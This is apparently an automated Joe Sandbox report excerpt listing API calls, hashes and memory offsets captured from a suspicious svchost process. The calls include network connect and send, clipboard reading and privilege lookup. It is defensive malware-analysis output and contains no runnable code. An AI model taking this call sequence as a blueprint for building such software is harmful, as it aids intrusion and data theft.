• Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
Similarity
• API ID: ChangeCloseFindNotification
• String ID:
• API String ID: 2591292051-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetProcessWorkingSetSize.KERNEL32(?,00000E24,EE396019,00000000,00000000,00000000,00000000), ref: 06532863
Memory Dump Source
• Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
Similarity
• API ID: ProcessSizeWorking
• String ID:
• API String ID: 3584180929-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetProcessWorkingSetSize.KERNEL32(?,00000E24,EE396019,00000000,00000000,00000000,00000000), ref: 0653277F
Memory Dump Source
• Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
Similarity
• API ID: ProcessSizeWorking
• String ID:
• API String ID: 3584180929-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 033BA5DE
Memory Dump Source
• Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetExitCodeProcess.KERNELBASE(?,00000E24,EE396019,00000000,00000000,00000000,00000000), ref: 065326A0
Memory Dump Source
• Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
Similarity
• API ID: CodeExitProcess
• String ID:
• API String ID: 3861947596-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• ReadFile.KERNELBASE(?,00000E24,EE396019,00000000,00000000,00000000,00000000), ref: 033BAF0D
Memory Dump Source
• Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• ioctlsocket.WS2_32(?,00000E24,EE396019,00000000,00000000,00000000,00000000), ref: 065321F7
Memory Dump Source
• Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
Similarity
• API ID: ioctlsocket
• String ID:
• API String ID: 3577187118-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• shutdown.WS2_32(?,00000E24,EE396019,00000000,00000000,00000000,00000000), ref: 06530EC0
Memory Dump Source
• Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
Similarity
• API ID: shutdown
• String ID:
• API String ID: 2510479042-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNELBASE(?,00000E24), ref: 06531713
Memory Dump Source
• Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: select
                                                                        • String ID:
                                                                        • API String ID: 1274211008-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 06532396
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetFileType.KERNELBASE(?,00000E24,EE396019,00000000,00000000,00000000,00000000), ref: 033BACBD
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: FileType
                                                                        • String ID:
                                                                        • API String ID: 3081899298-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 0653144A
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: Connect
                                                                        • String ID:
                                                                        • API String ID: 3144859779-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 033BA5DE
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 033BABF0
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • OleGetClipboard.OLE32(?,00000E24,?,?), ref: 033BA77E
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: Clipboard
                                                                        • String ID:
                                                                        • API String ID: 220874293-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • RegQueryValueExW.KERNELBASE(?,00000E24,?,?), ref: 06530526
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: QueryValue
                                                                        • String ID:
                                                                        • API String ID: 3660427363-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: send
                                                                        • String ID:
                                                                        • API String ID: 2809346765-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • WaitForInputIdle.USER32(?,?), ref: 033BB76F
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: IdleInputWait
                                                                        • String ID:
                                                                        • API String ID: 2200289081-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 033BA690
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2(l
                                                                        • API String ID: 0-367637329
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(?), ref: 033BAA44
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2(l
                                                                        • API String ID: 0-367637329
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2(l
                                                                        • API String ID: 0-367637329
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a214a9aa22bac20e5788d115f0f9b4bc4b6b8a797502afabd24ad45498944286
                                                                        • Instruction ID: 67369ce22ced7edf111a2dc40f9c39230e0e3046d7e35aad5de1f4c0bfd1d9fc
                                                                        • Opcode Fuzzy Hash: a214a9aa22bac20e5788d115f0f9b4bc4b6b8a797502afabd24ad45498944286
                                                                        • Instruction Fuzzy Hash: EA927134B041A59BEF159B3598117BE7BF6EB68308F04449AD48AA3784CF398D4ADF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 93f2e6d8e73678ac58270abb33db222f5727c6d1134f1abd3a941c731160d501
                                                                        • Instruction ID: 87aa618a08e9d1644c72d3a001d520ba9497b095414b2a4c1ae80778d579b53a
                                                                        • Opcode Fuzzy Hash: 93f2e6d8e73678ac58270abb33db222f5727c6d1134f1abd3a941c731160d501
                                                                        • Instruction Fuzzy Hash: A2D18F35B00209EFDB09DF75E450AAE77B2FF98348B108469E416A77A4DF39AC06CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a689fc8c86fc24b253f37d45f7ec1ef32e434a77eedb8f19669db2c3f704da47
                                                                        • Instruction ID: a182dfd99aa9894ba55544ac2c39ecb8f6aea0db76ccb0ed009f444fc8145fc3
                                                                        • Opcode Fuzzy Hash: a689fc8c86fc24b253f37d45f7ec1ef32e434a77eedb8f19669db2c3f704da47
                                                                        • Instruction Fuzzy Hash: 5BA14F35B00209EFDB09DF75E450AAE77B6FF98348B108569E416977A4DF39AC06CB40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9d25cb78502a36b9ccc854df490fcd0a1ff9efb65197b022f35815ddcc1c5ace
                                                                        • Instruction ID: 55fbc28e1810d14a6e4e12f209735608edf780063c8450d4f4ca10979d16f014
                                                                        • Opcode Fuzzy Hash: 9d25cb78502a36b9ccc854df490fcd0a1ff9efb65197b022f35815ddcc1c5ace
                                                                        • Instruction Fuzzy Hash: A0913C34B00209EFDB09DF75E450AAE77B2FF98348B11856AE416977A4DF39AC06CB40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ca2e4922578cb684fd4c0b12383b13dbb9514526c2d5334d29cdfcca2e0d9ad9
                                                                        • Instruction ID: eebc8768ae0b387a91518062d338cd5a5b820f361f27c97c42f18b9bf2848adf
                                                                        • Opcode Fuzzy Hash: ca2e4922578cb684fd4c0b12383b13dbb9514526c2d5334d29cdfcca2e0d9ad9
                                                                        • Instruction Fuzzy Hash: 2C913C34B00215EFDB19DF74E450AAE77B2FF98348B11856AE816977A4DF39AC06CB40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4019f416224c22bcd3dd8b79e0f062bcfbd8801d9931ec5211554f8d0b16c35f
                                                                        • Instruction ID: feb347f18fa145d79839db24cceeeb290dbf511466154a9c4b8461dda4cca527
                                                                        • Opcode Fuzzy Hash: 4019f416224c22bcd3dd8b79e0f062bcfbd8801d9931ec5211554f8d0b16c35f
                                                                        • Instruction Fuzzy Hash: DE811934B00215EFDB19DF74E450AAE77B2FF98348B11856AE816977A4DF39AC06CB40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 36f707205baa346e21fd259a90a6cb1959648a988c3bd7c4b992c497fa2510e9
                                                                        • Instruction ID: f3984f3429f8772040a42f60b9a872ecbdd7121d82d23279ac4400bd1d49c193
                                                                        • Opcode Fuzzy Hash: 36f707205baa346e21fd259a90a6cb1959648a988c3bd7c4b992c497fa2510e9
                                                                        • Instruction Fuzzy Hash: BD711A34B00214EFDB19DF74E450AAE77B2FF98348B11856AE816977A4DF39AC06CB41
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d2477dac7756adf8d6a5a41eaed6595b161ba1c661d974b86e7ece0f10f16654
                                                                        • Instruction ID: 0bd7ca9b6f9f37b60a379562921bf373318000e017d33883e502a0a402507647
                                                                        • Opcode Fuzzy Hash: d2477dac7756adf8d6a5a41eaed6595b161ba1c661d974b86e7ece0f10f16654
                                                                        • Instruction Fuzzy Hash: 8651BE30608242DBEB15CF3698457A97BE6FB45315F1889ADE452DB2D0EF38DE06CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ef883b01c613e38428aa1cb8a87e98c356c40165aaa7261e55713c42c73b8d13
                                                                        • Instruction ID: 7f33d2cdf87f2bf38308d8141ffb2a8efd9016108c0604ef6a9c8f43d80b9837
                                                                        • Opcode Fuzzy Hash: ef883b01c613e38428aa1cb8a87e98c356c40165aaa7261e55713c42c73b8d13
                                                                        • Instruction Fuzzy Hash: E1516E34B002159FDB18DF75E450AAE77B2EF98348F10846AE816977D4DF399C06CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 66d77fa70bc050691a42d4a60dbbf179a0858019d146fa128296fa639d8a9009
                                                                        • Instruction ID: 6c9985f2474a629f5208765db7063fa8fc1b4dd03e6243e66344a2ffc6d55bd8
                                                                        • Opcode Fuzzy Hash: 66d77fa70bc050691a42d4a60dbbf179a0858019d146fa128296fa639d8a9009
                                                                        • Instruction Fuzzy Hash: 4E41AD35604216DBEB15DF3698457A93AE2FB44355F1889ADE422DB2D0DF38DE02CF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f3c716f44b90726fee2656526fa48e68df36aefc39d8da92e46b3f2635dcda79
                                                                        • Instruction ID: e12e8a188415feba0644ef84b60966a4caa1b367054ddb076514ce082044ddfd
                                                                        • Opcode Fuzzy Hash: f3c716f44b90726fee2656526fa48e68df36aefc39d8da92e46b3f2635dcda79
                                                                        • Instruction Fuzzy Hash: CD31D031B00215AFDB04BB74D8157BE36ABEB98208F40487AD405E7794EF3D9D0AC791
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 00c53ba523d1b92944348f74202a5d82d76fc2e93eea8d1f99cd1aa14a8befdd
                                                                        • Instruction ID: 58a044caf279f63a102bd1d61f148da976fa0f9a42ee61313ffe16ca46178cf6
                                                                        • Opcode Fuzzy Hash: 00c53ba523d1b92944348f74202a5d82d76fc2e93eea8d1f99cd1aa14a8befdd
                                                                        • Instruction Fuzzy Hash: 1B31AA30B002059FDB14DF75C884BAEBBF6AF88714F1485A9E405EB3A0CF74AD058B91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4099844090.0000000003401000.00000040.00000020.00020000.00000000.sdmp, Offset: 03401000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_3401000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 359e035c7b18898f22dbc4ddfbe8778191920203a3c2048118913e9fedf4f3a1
                                                                        • Instruction ID: ae46eb5138a5db1239d3d0d2fec218a72d241ca297e1a5534bc67b0369cb97d0
                                                                        • Opcode Fuzzy Hash: 359e035c7b18898f22dbc4ddfbe8778191920203a3c2048118913e9fedf4f3a1
                                                                        • Instruction Fuzzy Hash: 022128352097C09FD7078B60C960B52BFB1AF4B714F1985EAD4848F6A3C27A9816DB52
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125943774.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6580000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 577a877b4bfd593a26befb225fc3f4d4a3963878cb72f3ced78a9de36c9c1ce2
                                                                        • Instruction ID: dd8b92d2d9bb33aae5e8a4ac7cfe7881f2367d1c2594031cdae265afafd74241
                                                                        • Opcode Fuzzy Hash: 577a877b4bfd593a26befb225fc3f4d4a3963878cb72f3ced78a9de36c9c1ce2
                                                                        • Instruction Fuzzy Hash: C911B8B5908341AFD350CF19D880A5BFBE4FB88664F04895EF99897311D231E9048FA2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4099844090.0000000003401000.00000040.00000020.00020000.00000000.sdmp, Offset: 03401000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_3401000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: afb04a9148633409fbc65daa6330cdcf55ce49d74efd5a44a0b83bdd672bf2cb
                                                                        • Instruction ID: a8980b74dddd40bb099108b85aa31ed4f7ee9ac323ecf9020a89213f0a251f46
                                                                        • Opcode Fuzzy Hash: afb04a9148633409fbc65daa6330cdcf55ce49d74efd5a44a0b83bdd672bf2cb
                                                                        • Instruction Fuzzy Hash: 9711E4383042809FD315CB54D580B26FBE5AB89708F28C9AEE8495BB92C777D803CA55
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4099844090.0000000003401000.00000040.00000020.00020000.00000000.sdmp, Offset: 03401000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_3401000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2681ad66752e8d1a7777201c64af176abd2702aad0e31a3a55b4257e4e96b6f6
                                                                        • Instruction ID: 508beb8961748c8f92784b1b176e678073bc835ed27e79d355ba651911069d2e
                                                                        • Opcode Fuzzy Hash: 2681ad66752e8d1a7777201c64af176abd2702aad0e31a3a55b4257e4e96b6f6
                                                                        • Instruction Fuzzy Hash: 62212C3510D3C09FD7038B60C950B12BFB1AF4B714F1985DAD4858F6A3C2369816DB52
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e1bf127348e8e5d190993655bfd9102a7738a4d7b0f3c6928404d2e38c98980f
                                                                        • Instruction ID: d476a42d79224b1f9203245d0fb37ef1f27d8b82695709ddbc1b79cee469c643
                                                                        • Opcode Fuzzy Hash: e1bf127348e8e5d190993655bfd9102a7738a4d7b0f3c6928404d2e38c98980f
                                                                        • Instruction Fuzzy Hash: 4211A171F002198FCF14DBB8D8455AE77F6EB8A254710457AC40AE7790EF349D06CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1ba056fbb47f0643c344fac5a31d0e5e06d9b4a1619eef250d299c34be69ac6e
                                                                        • Instruction ID: 71bb3bad9ebad8c37b99108ffa308c3c95bb47f67c636ffc069b4aa0ac443c03
                                                                        • Opcode Fuzzy Hash: 1ba056fbb47f0643c344fac5a31d0e5e06d9b4a1619eef250d299c34be69ac6e
                                                                        • Instruction Fuzzy Hash: F501B36105E3C59FD7039B24DC656913FB0AB17214F4A89D7D080CB6A7D668580A9762
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125943774.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6580000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 73870506539e62388ba583a035305bf13b5d3cd5f1a2794b26b6f5662014ede0
                                                                        • Instruction ID: 832f2eb16f5920acc183069348d325a0090721c4091855f958e4d3ce1877ac2b
                                                                        • Opcode Fuzzy Hash: 73870506539e62388ba583a035305bf13b5d3cd5f1a2794b26b6f5662014ede0
                                                                        • Instruction Fuzzy Hash: 0511FAB5908305AFD350CF09DC84E5BFBE8EB88660F04881EF99897311D231E9088FA2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4085183956.00000000033CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033CA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
